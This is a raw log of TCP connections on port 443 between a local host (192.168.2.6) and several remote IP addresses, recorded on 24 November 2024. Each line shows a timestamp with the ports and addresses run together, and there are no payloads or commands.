                                                                                                                                                                                              Nov 24, 2024 13:39:07.569355965 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.569361925 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.581610918 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.581670046 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.581676006 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.636224031 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.654033899 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.654400110 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.654467106 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:07.655323029 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:07.655333042 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.655344963 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:07.736784935 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.736845016 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.736901045 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.736915112 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.736948013 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.737006903 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.737230062 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.737235069 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.737261057 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.737265110 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:08.061129093 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:08.061167955 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:08.061260939 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:08.062459946 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:08.062474012 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:09.177499056 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:09.177536964 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:09.177684069 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:09.178239107 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:09.178255081 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:09.374866962 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:09.374968052 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:09.376286983 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:09.376302958 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:09.376502991 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:09.378102064 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:09.378603935 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:09.378634930 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:09.914664030 CET44349702173.222.162.64192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:09.914772987 CET49702443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:10.568984032 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:10.569091082 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:10.569155931 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:10.569315910 CET49710443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:10.569330931 CET44349710104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:10.716645002 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:10.716711998 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:10.716794014 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:10.717844009 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:10.717863083 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.084917068 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.085051060 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.086936951 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.086951971 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.087281942 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.097932100 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.139372110 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.587718964 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.587740898 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.587760925 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.587799072 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.587815046 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.587829113 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.587862015 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.784950972 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.784972906 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.785120964 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.785155058 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.785201073 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.830702066 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.830723047 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.830780029 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.830801964 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.830826044 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.830851078 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.978735924 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.978756905 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.978895903 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:11.978928089 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:11.978977919 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.016331911 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.016350031 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.016427040 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.016438007 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.016484976 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.038261890 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.038279057 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.038364887 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.038377047 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.038414001 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.056979895 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.056997061 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.057172060 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.057188034 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.057238102 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.058852911 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.058940887 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:12.060530901 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:12.060544968 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.060750008 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.061975002 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:12.062103033 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:12.062138081 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.062199116 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:12.062208891 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.189544916 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.189595938 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.189649105 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.189691067 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.189709902 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.189734936 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.935075045 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.935112953 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.935162067 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.935233116 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.935266018 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.935282946 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.935323954 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.948199987 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.948227882 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.948324919 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.948348999 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.948406935 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.961222887 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.961244106 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.961308956 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.961318970 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.961368084 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.975141048 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.975163937 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.975255966 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.975275040 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.975374937 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.986140966 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.986162901 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.986265898 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.986289978 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.986362934 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.987915039 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.987983942 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:12.988034010 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.988084078 CET49711443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:12.988116026 CET4434971113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.026176929 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.026238918 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.026336908 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.027801991 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.027838945 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.027895927 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.028155088 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.028177023 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.028762102 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.028779030 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.029525995 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.029547930 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.029619932 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.029717922 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.029742956 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.030575991 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.030608892 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.030670881 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031150103 CET49717443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031181097 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031244040 CET49717443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031306982 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031322956 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031395912 CET49717443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031404972 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031871080 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.031972885 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.032037020 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:13.032172918 CET49712443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:13.032200098 CET44349712104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.275105000 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:13.275158882 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:13.275253057 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:13.275659084 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:13.275676012 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.539664030 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.539818048 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:14.541290045 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:14.541301012 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.541706085 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.543101072 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:14.543266058 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:14.543307066 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.543462038 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:14.543469906 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.837373972 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.837780952 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.838105917 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.838133097 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.838365078 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.838377953 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.838641882 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.838646889 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.839010000 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.839015007 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.840559006 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.840920925 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.840962887 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.841331959 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.841337919 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.841923952 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.842180014 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.842222929 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.842247009 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.842577934 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.842583895 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.842732906 CET49717443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.842775106 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:14.843135118 CET49717443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:14.843143940 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288161039 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288228035 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288369894 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288384914 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288451910 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288507938 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288539886 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288733959 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288750887 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288760900 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288764954 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288799047 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288813114 CET49714443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.288819075 CET4434971413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289125919 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289211035 CET4434971513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289257050 CET49715443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289535999 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289608955 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289665937 CET49717443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289714098 CET49717443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289714098 CET49717443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289736032 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.289752960 CET4434971713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.291820049 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.291845083 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.291924953 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.291940928 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.291985989 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292392969 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292411089 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292437077 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292505980 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292516947 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292582989 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292640924 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292656898 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292762041 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292771101 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292788982 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292817116 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292853117 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292958021 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.292990923 CET4434971313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.293031931 CET49713443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.293792009 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.293837070 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.293919086 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.294033051 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.294049025 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.295217037 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.295239925 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.295345068 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.295447111 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.295473099 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.296777964 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.296802998 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.296864986 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.296899080 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.296943903 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.297019005 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.297028065 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.297045946 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.297178984 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.297209978 CET4434971613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.297247887 CET49716443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.298825979 CET49723443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.298866034 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.298938036 CET49723443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.299060106 CET49723443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:15.299072027 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.412750959 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.412903070 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.412969112 CET49718443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:15.413132906 CET49718443192.168.2.6104.21.33.116
